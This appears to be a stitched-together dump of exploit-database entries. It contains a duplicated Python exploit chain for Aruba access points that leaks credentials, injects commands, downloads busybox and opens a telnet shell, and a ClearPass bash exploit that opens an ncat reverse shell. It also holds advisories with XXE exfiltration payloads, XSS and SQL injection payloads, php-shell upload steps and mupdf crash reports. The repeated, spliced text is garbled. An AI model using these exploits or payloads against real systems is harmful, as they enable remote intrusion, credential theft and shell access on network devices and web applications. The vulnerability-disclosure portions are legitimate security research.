import xml.etree.ElementTree as ET
import requests
urllib3.disable_warnings()
CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245
def race_papi_message(ip):
global CONTINUE_RACE
payload = b"\x49\x72"
payload += b"\x00\x03"
payload += b"\x7F\x00\x00\x01"
payload += b"\x7F\x00\x00\x01"
payload += b"\x00\x00"
payload += b"\x00\x00"
payload += b"\x3B\x7E"
payload += b"\x41\x41"
payload += b"\x04\x22"
payload += b"\x00\x00"
payload += b"\x02\x00"
payload += b"\x00\x00"
payload += b"\x00" * 12 * 4
text_to_send = bytes()
for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)
packet = payload + text_to_send
while CONTINUE_RACE:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((ip, 8211))
s.send(packet)
s.close()
time.sleep(0.004)
def find_credentials(text):
res = re.search("mgmt-user .*", text)[0]
res = res.split(" ")
return (res[1], res[2])
def login(ip, username, password):
login_data = {
"opcode": "login",
"user": username,
"passwd": password,
"refresh": "false",
}
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)
root = ET.fromstring(res.text)
return root.find("./data[@name='sid']").text
def create_directory(ip, sid):
request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
if "/tmp/oper_" in res.text:
print("[+] Successfully created /tmp/oper_/ directory :)")
return True
else:
print("[-] Failed creating /tmp/oper_/ directory")
return False
def prepare_upload_id(command):
base_payload = "/../../etc/httpd/"
cmd_len = len(command)
padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces
if padding_len < 0:
print("[-] Command too long length:{}".format(padding_len))
exit(1)
return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)
def create_file(ip, command):
upload_id = prepare_upload_id(command)
requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)
def run_command(ip, command):
print("[*] Executing telnet")
command = command.replace("?", "%3F")
command = command.replace("#", "\\\\x23")
s = requests.Session()
req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
prep = req.prepare()
response = s.send(prep, verify=False)
return response.text
def build_command(command):
command = command.replace("/", "\\\\x2F")
command = command.replace("#", "\\\\x23")
command = command.replace("\"", "\\\"")
command = command.replace("`", "\`")
final_command = "echo -e \"{}\"|sh".format(command)
return final_command
def telnet_connect(router_ip):
print("[*] Connecting to telnet")
with telnetlib.Telnet(router_ip, 22222) as tn:
tn.write(b"rm /etc/httpd/A*sh*.gz\n")
tn.interact()
def main():
global CONTINUE_RACE
ip = sys.argv[1]
print("[*] Starting the PAPI race thread")
papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
papi_thread.start()
while CONTINUE_RACE:
time.sleep(0.1)
res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
if "version" in res.text:
print("[+] Successfully leaked the password from config")
CONTINUE_RACE = False
file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
user, password = find_credentials(file_content)
print("[+] Successfully extracted username: {} and password: {}".format(user, password))
sid = login(ip, user, password)
print("[*] SID generated: {}".format(sid))
command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
final_command = build_command(command)
if not create_directory(ip, sid):
return
print("[*] Creating malicious file in /etc/httpd/")
create_file(ip, final_command)
print(run_command(ip, final_command))
time.sleep(1) # Sleeping waiting for telnet.
telnet_connect(ip)
if __name__ == "__main__":
main()
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests
urllib3.disable_warnings()
CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245
def race_papi_message(ip):
global CONTINUE_RACE
payload = b"\x49\x72"
payload += b"\x00\x03"
payload += b"\x7F\x00\x00\x01"
payload += b"\x7F\x00\x00\x01"
payload += b"\x00\x00"
payload += b"\x00\x00"
payload += b"\x3B\x7E"
payload += b"\x41\x41"
payload += b"\x04\x22"
payload += b"\x00\x00"
payload += b"\x02\x00"
payload += b"\x00\x00"
payload += b"\x00" * 12 * 4
text_to_send = bytes()
for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)
packet = payload + text_to_send
while CONTINUE_RACE:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((ip, 8211))
s.send(packet)
s.close()
time.sleep(0.004)
def find_credentials(text):
res = re.search("mgmt-user .*", text)[0]
res = res.split(" ")
return (res[1], res[2])
def login(ip, username, password):
login_data = {
"opcode": "login",
"user": username,
"passwd": password,
"refresh": "false",
}
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False)
root = ET.fromstring(res.text)
return root.find("./data[@name='sid']").text
def create_directory(ip, sid):
request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid)
res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False)
if "/tmp/oper_" in res.text:
print("[+] Successfully created /tmp/oper_/ directory :)")
return True
else:
print("[-] Failed creating /tmp/oper_/ directory")
return False
def prepare_upload_id(command):
base_payload = "/../../etc/httpd/"
cmd_len = len(command)
padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces
if padding_len < 0:
print("[-] Command too long length:{}".format(padding_len))
exit(1)
return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command)
def create_file(ip, command):
upload_id = prepare_upload_id(command)
requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False)
def run_command(ip, command):
print("[*] Executing telnet")
command = command.replace("?", "%3F")
command = command.replace("#", "\\\\x23")
s = requests.Session()
req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command))
prep = req.prepare()
response = s.send(prep, verify=False)
return response.text
def build_command(command):
command = command.replace("/", "\\\\x2F")
command = command.replace("#", "\\\\x23")
command = command.replace("\"", "\\\"")
command = command.replace("`", "\`")
final_command = "echo -e \"{}\"|sh".format(command)
return final_command
def telnet_connect(router_ip):
print("[*] Connecting to telnet")
with telnetlib.Telnet(router_ip, 22222) as tn:
tn.write(b"rm /etc/httpd/A*sh*.gz\n")
tn.interact()
def main():
global CONTINUE_RACE
ip = sys.argv[1]
print("[*] Starting the PAPI race thread")
papi_thread = threading.Thread(target=race_papi_message, args=(ip, ))
papi_thread.start()
while CONTINUE_RACE:
time.sleep(0.1)
res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False)
if "version" in res.text:
print("[+] Successfully leaked the password from config")
CONTINUE_RACE = False
file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0]
user, password = find_credentials(file_content)
print("[+] Successfully extracted username: {} and password: {}".format(user, password))
sid = login(ip, user, password)
print("[*] SID generated: {}".format(sid))
command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh"""
final_command = build_command(command)
if not create_directory(ip, sid):
return
print("[*] Creating malicious file in /etc/httpd/")
create_file(ip, final_command)
print(run_command(ip, final_command))
time.sleep(1) # Sleeping waiting for telnet.
telnet_connect(ip)
if __name__ == "__main__":
main()
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115
Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.
#!/usr/bin/env bash
if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi
cat <<EOF >>payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF
gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
cat <<"EOF"
/(\
¡ !´\
| )\ `.
| `.) \,-,--
( / /
`'-.,;_/
`----
EOF
printf "\nPleasea waita for your spicy shell...\n\n"
ncat -v -l $3 $4
===============================================================================
title: ClearPass Policy Manager Stored XSS
case id: CM-2014-01
product: Aruba ClearPass Policy Manager
vulnerability type: Stored cross-site script
severity: Medium
found: 2014-11-24
by: Cristiano Maruti (@cmaruti)
===============================================================================
[EXECUTIVE SUMMARY]
The analysis discovered a stored cross site scripting vulnerability (OWASP
OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated
user is able to inject arbitrary script through the login form that may be
rendered and triggered later if a privileged authenticated user reviews the
access audit record. An attack can use the aforementioned vulnerability to
effectively steal session cookies of privileged logged on users.
[VULNERABLE VERSIONS]
The following version of the Aruba ClearPass Policy Manager was affected by the
vulnerability; previous versions may be vulnerable as well:
- Aruba ClearPass Policy Manager 6.4
[TECHNICAL DETAILS]
It is possible to reproduce the vulnerability following these steps:
1. Open the login page with your browser;
2. Put the "><img src=x onerror=alert(1337)><" string in the username field
and fill in the password field with a value of your choice;
3. Submit the form;
4. Login to the application with an administrative user:
5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload.
Below a full transcript of the HTTP request used to raise the vulnerability
HTTP Request
-------------------------------------------------------------------------------
POST /tips/tipsLoginSubmit.action HTTP/1.1
Host: 10.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.0.0.1/tips/tipsLoginSubmit.action
Cookie: <A VALID UNAUTH COOKIE>
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
username="><img src=x onerror=alert("0wn3d")><"&password=test
-------------------------------------------------------------------------------
A copy of the report with technical details about the vulnerability I have
identified is available at:
https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
[VULNERABILITY REFERENCE]
The following CVE ID was allocated to track the vulnerability:
- CVE-2015-1389: Stored cross-site scripting (XSS)
[DISCLOSURE TIMELINE]
2014-11-24 Vulnerability submitted to vendor through the Bugcrowd
bounty program.
2014-12-09 Vendor acknowledged the problem.
2014-12-10 Researcher requested to publicly disclose the issue.
2015-02-16 Vendor released a fix for the reported issue.
2015-02-09 Vendor asked to hold-on for the public disclosure.
2015-02-22 Vendor postponed the public disclosure date
2015-02-22 Public coordinated disclosure.
[SOLUTION]
Aruba release an update to fix the vulnerability (ClearPass 6.5 or
later). Please see
the below link for further information released by the vendor:
- http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt
[REPORT URL]
https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf
SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
=======================================================================
title: XML External Entity Injection (XXE),
Reflected Cross Site Scripting
product: Aruba AirWave
vulnerable version: <=8.2.3
fixed version: 8.2.3.1
CVE number: CVE-2016-8526, CVE-2016-8527
impact: high
homepage: http://www.arubanetworks.com/
found: 2016-11-21
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
is a networking vendor selling enterprise wireless LAN and edge access
networking equipment. The company has over 1,800 employees and is
headquartered in Sunnyvale, California. Aruba's core products are access points
(APs), mobility controllers, and network management software through their
Airwave Management Platform product."
Source: https://en.wikipedia.org/wiki/Aruba_Networks
Business recommendation:
------------------------
SEC Consult recommends not to use the product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) XML External Entity Injection (CVE-2016-8526)
The used XML parser is resolving external XML entities which allows attackers
to read files and send requests to systems on the internal network (e.g port
scanning).
The vulnerability can be exploited by a low privileged read-only user
to read sensitive information / files with malicious XML code.
Note that as Aruba's passwords are encrypted with a shared static key,
privilege escalation to admin role is also possible!
Multiple different functions are affected by XXE.
According to the vendor another researcher has also found one of the XXE issues, hence
credits go to them as well.
Vendor: "Although the team hasn't reproduced this yet, I’ve had other reports
come in through our bug bounty program last month about XXE issues in VisualRF.
One of the issues you reported is the same, and you reported three others that we
haven't seen yet."
2) Reflected Cross Site Scripting (CVE-2016-8527)
Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.
Proof of concept:
-----------------
1) XML External Entity Injection (CVE-2016-8526)
a) XXE in VisualRF Backup Sites
Login as any user role (including read-only/standard user)
Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
Select a campus (e.g. Default Campus) > Select 'Edit' >
Select action 'Export Floor Plans' > Ok
POST /visualrf/backup_sites HTTP/1.1
Host: <AirWaveHost>
[...]
xml=<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY %25 foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1">%26%65%78%66%69%6c%3b</visualrf:sites>
$ cat sectest.dtd
<!ENTITY % data SYSTEM "file:///<removed>">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>">
$ python -m SimpleHTTPServer 1234
$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
$ ruby xxe-ftp-server.rb
FTP. New client connected
< USER anonymous
< PASS Java1.8.0_102@
> 230 more data please!
< TYPE I
> 230 more data please!
< CWD [General]
[...]
< ; set global WLC credentials
> 230 more data please!
< wlc_user: <username>
> 230 more data please!
< wlc_pasw: <password>
[...]
b) XXE in Visual RF Site Restore
$ cat version.xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/version.dtd">%foo;%param1;]>
&exfil;<backup backup-time="Mon Nov 21 14:44:41 CET 2016" build="${svn.build}" plan-mode="false" version="8.0.0"/>
$ zip backup_sectest.zip version.xml
adding: version.xml (deflated 16%)
And then just upload the backup_sectest.zip via the restore functionality.
POST /nf/visualrf_siterestore HTTP/1.1
Host: <AirWaveHost>
[...]
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
Content-Type: application/zip
[.. backup_sectest.zip ..]
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
Content-Disposition: form-data; name="import"
Import
------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--
c) XXE in Visual RF Verify
POST /visualrf/verify/<Site-ID> HTTP/1.1
Host: <AirWaveHost>
[...]
<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE x [<!ENTITY % foo SYSTEM "http://<AttackerHost>:1234/sectest.dtd">%foo;%param1;]><visualrf:sites xmlns:visualrf="http://www.airwave.com/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="1"><site
[...]
/>&exfil;</site></visualrf:sites>
2) Reflected Cross Site Scripting (CVE-2016-8527)
Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.
GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
Host: <AirWaveHost>
[...]
HTTP/1.1 200 OK
[...]
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<results>
<error>For input string: "<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'/></a>"</error>
</results>
Vulnerable / tested versions:
-----------------------------
The following versions are affected by the identified vulnerabilities which
were the most recent versions at the time of discovery:
Aruba AirWave version <8.2.3.1
Vendor contact timeline:
------------------------
2016-11-23: Contacting vendor through aruba-sirt@hpe.com
2016-11-23: Vendor: Established communication over encrypted channel and asked
for extending the disclosure date due to the upcoming holidays
2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
the reflected XSS issue.
2017-02-21: Aruba AirWave 8.2.3.1 was released.
2017-03-01: Coordinated disclosure of the security advisory.
Solution:
---------
Update to version 8.2.3.1 or later.
http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Pichaya Morimoto / @2017
# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
# Exploit Author: Vijay Sachdeva
# Date: 2020-12-22
# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
# Affected Version: Version 1
# Tested on Kali Linux
Step 1. Log in to the application with admin credentials.
Step 2. Click on "Explore" and then select "Artworks".
Step 3. Choose any item, the URL should be "
http://localhost/art-bay/info_art.php?id=6
Step 4. Run sqlmap on the URL where the "id" parameter is given
sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=8 AND 4531=4531
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=8 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
-
---
[08:18:34] [INFO] the back-end DBMS is MySQL
[08:18:34] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.24-MariaDB-2'
---
Step 5. Sqlmap should inject the web-app successfully which leads to
information disclosure.
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28687
--------------------
Proof of Concept:
--------------------
1. Authenticate as a user (or signup as an artist)
2. Go to edit profile
3. Upload a php-shell as profile picture and click update/save
4. Find your shell at 'http://<ip>/<base_url>/pictures/profile/<shell.php>' and get command execution
# Exploit Title: Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated)
# Date: November 17th, 2020
# Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24)
# Vendor Homepage: Source Code & Projects (https://code-projects.org)
# Software Link: https://download.code-projects.org/details/9dfede24-03cc-42a8-b319-f666757ac7cf
# Version: 1.0
# Tested On: Windows 10 (XAMPP Server)
# CVE: CVE-2020-28688
---------------------
Proof of Concept:
---------------------
1. Authenticate as a user (or signup as an artist)
2. Click the drop down for your username and go to My ART+BAY
3. Click on My Artworks > My Available Artworks > Add an Artwork
4. Click on any type of artwork and instead of the picture, upload your php-shell > click on upload
5. Find your shell at 'http://<ip>/<base_url>/pictures/arts/<shell.php>' and get command execution
source: https://www.securityfocus.com/bid/53586/info
Artiphp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Artiphp 5.5.0 Neo is vulnerable; other versions may also be affected.
POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
add_img_name_post "onmouseover=prompt(1) joxy
adresse_destinataire
adresse_expediteur lab%40zeroscience.mk
asciiart_post "onmouseover=prompt(2) joxy
expediteur "onmouseover=prompt(3) joxy
message Hello%20World
message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send Send
titre_sav "onmouseover=prompt(4) joxy
url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920 2
Source: http://seclists.org/oss-sec/2017/q1/458
Description:
Mujstest, which is part of mupdf is a scriptable tester for mupdf + js.
A crafted image posted early for another issue, causes a stack overflow.
The complete ASan output:
# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
#0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-
r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
#1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:358:7
#2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-
r3/work/glibc-2.23/csu/../csu/libc-start.c:289
#3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in
frame
#0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:293
This frame has 7 object(s):
[32, 1056) 'path'
[1184, 2208) 'text' <== Memory access at offset 1056 partially underflows
this variable
[2336, 2340) 'w' <== Memory access at offset 1056 partially underflows
this variable
[2352, 2356) 'h' <== Memory access at offset 1056 partially underflows
this variable
[2368, 2372) 'x' <== Memory access at offset 1056 partially underflows
this variable
[2384, 2388) 'y' <== Memory access at offset 1056 partially underflows
this variable
[2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
f2 f2
0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32127==ABORTING
Affected version:
1.10a
Fixed version:
N/A
Commit fix:
N/A
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-6060
Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org
Note:
This bug was found with Address Sanitizer.
Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
POC to trigger null pointer dereference (mutool)
After some fuzz testing I found a crashing test case.
Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
ASAN:
==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
#0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
#1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
#2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
#3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
#4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
#5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
#6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
#7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
#8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
#9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
#10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
#11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
#12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
#13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
#14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
#15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
#16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
#17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
#18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
#19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
#20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
AddressSanitizer can not provide additional info.
